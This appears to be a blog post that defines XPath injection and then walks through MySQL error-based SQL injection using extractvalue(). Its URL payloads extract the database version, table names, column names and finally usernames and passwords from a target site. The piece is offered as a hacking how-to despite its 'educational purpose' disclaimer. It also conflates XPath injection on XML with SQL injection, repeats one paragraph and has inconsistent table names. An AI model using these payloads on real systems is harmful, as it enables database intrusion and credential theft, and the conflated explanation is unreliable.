NOTE: ONLY FOR EDUCATIONAL PURPOSE. IT IS TOTALLY ILLEGAL AND YOU WILL BE PUNISHED. SO DONT TRY.
XPath Injection:SQL is the most popular type of code injection attack, there are several others that can be just as dangerous to your applications and your data, including LDAP injection and XPath injection. An ‘XPath injection’ attack is similar to an SQL injection attack, but its target is an XML document rather than an SQL database. ‘XPath Injection’ is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.
What is XML?
XML stands for Extensible Markup Language and was designed to describe data. It allows programmers to create their own customized tags to store data. In XML the data is stored in nodes in a tree form. XML Path or XPath language is used for querying information from the nodes of an XML document. Please refer to XML Tutorial for more details on XML.
What is XPath?
“XML Path” or “XPath” 1.0 is a language used to refer to parts of an XML document. Path expressions are used to access elements and attributes in an XML document, which return a node-set, a string, a Boolean or a number. It can be used directly to query an XML document by an application, or as part of a larger operation such as applying an XSLT transformation to an XML document, or applying an XQuery to an XML document. Please refer to XPath Tutorial for more details on XPath.
In Detail:
Code Injection is a technique to Inject code into a program or application code by taking advantage of the unchecked assumptions the application makes about its inputs to bypass or modify the originally intended functionality of the code. All code injection attacks work in a same way; an attacker injects malicious code into the application code through an input field of the application. So, to perform such attacks there must be entry points that are not performing adequate validation.
Consider a Web application that uses XPath to query an XML document to retrieve the social security number of a customer by passing name and password values that are supplied by the user of the application. If the application embeds these values directly in the XPath query then it is vulnerable to XPath Injection.
OK, so when to use it? Let us assume we have found a vulnerable
site that appears to be vulnerable from our usual quick tests, but when
we try to inject using ORDER BY we get no errors generated. We double
check using String injection method to make sure that it is not the
problem, but still no results. Time to give up? Never, let us now try to
see if we might be able to use XPATH injection.
We will start with a quick check to confirm versioning to ensure
this method can be used, as it only works on MySQL version >=5.1
(best with errors present). The first check for version and user looks
like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,version(),0x3a,user()))—
RESULT: ’Xpath syntax error: version info:user info’
OK, so now we have confirmation that this method will work as
clearly displayed in the errors seen. We now have the version and
current user info. Now we will move to checking the table info, like
this:

This is the biggest problem with XPATH Injection, it gets tricky here. You will need to use the LIMIT statement to sort your results and keep traffic of all of the table names found. This can be very time consuming, but it is key that you use your brain to pick up on any relationships that become obvious as you are sorting through tables, while also keeping an eye out for juicy tables that may warrant further investigation in future steps. I suggest first sorting them to find the lower and upper limits so you know what type of range you are working with (some sites will be only a few and others will have thousands in total – see example below).
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 0,1)))–
RESULT: ’Xpath syntax error: <Table Name Found at address used in LIMIT statement>’
This is the biggest problem with XPATH Injection, it gets tricky here. You will need to use the LIMIT statement to sort your results and keep traffic of all of the table names found. This can be very time consuming, but it is key that you use your brain to pick up on any relationships that become obvious as you are sorting through tables, while also keeping an eye out for juicy tables that may warrant further investigation in future steps. I suggest first sorting them to find the lower and upper limits so you know what type of range you are working with (some sites will be only a few and others will have thousands in total – see example below).
Once you have determined the table info, you will need to follow
similar steps to pull the column details. It works very similar to
tables and looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,column_name) from information_schema.columns limit 0,1)))–
RESULT: ‘Xpath syntax error: <column name found at address used in LIMIT statement>’
This is just as time consuming as the pulling the table names and
is a bit tricky as it becomes very hard to tell what columns link to
what tables or database for that matter, for this reason it is key to
use your brain power to make some logical determinations about what you
find. This means you can use your brain to deduce that you have found a
table named mysql_auth_users and columns idx, username, and password. It
would not be a great stretch to assume these might go together. I tend
to use a bit of trial and error on this last part but have found if you
just think about it for a minute you can usually make the necessary
connections to extract what you want. That being said, extraction of
data works the exact same as it does for simple SQLi. You choose the
columns you want and indicate what table to pull from and parse the
results from the error given. It looks like this:
COMMAND: http://site.com/index.php?id=1 and extractvalue(rand(),concat(0x3a,(select concat(0x3a,idx,0x3a,username,0x3a,password) from mysql_auth_usr)))–
RESULT: Xpath syntax error: ‘:1:admin:password1’
Now you have successfully injected and extracted the data using
XPATH injection! Now go pat yourself on the back for learning a new
method and enjoy a well-deserved break
There are other XPATH queries that can be used but this is the one I
have found the best results with. You can also use updatexml(). I will
continue to add to this as I investigate this technique more, but this
concludes my write up on XPATH injection using the EXTRACTVLAUE() method
for now. I hope you have found this interesting and educational and as
always until next time Enjoy!

No comments:
Post a Comment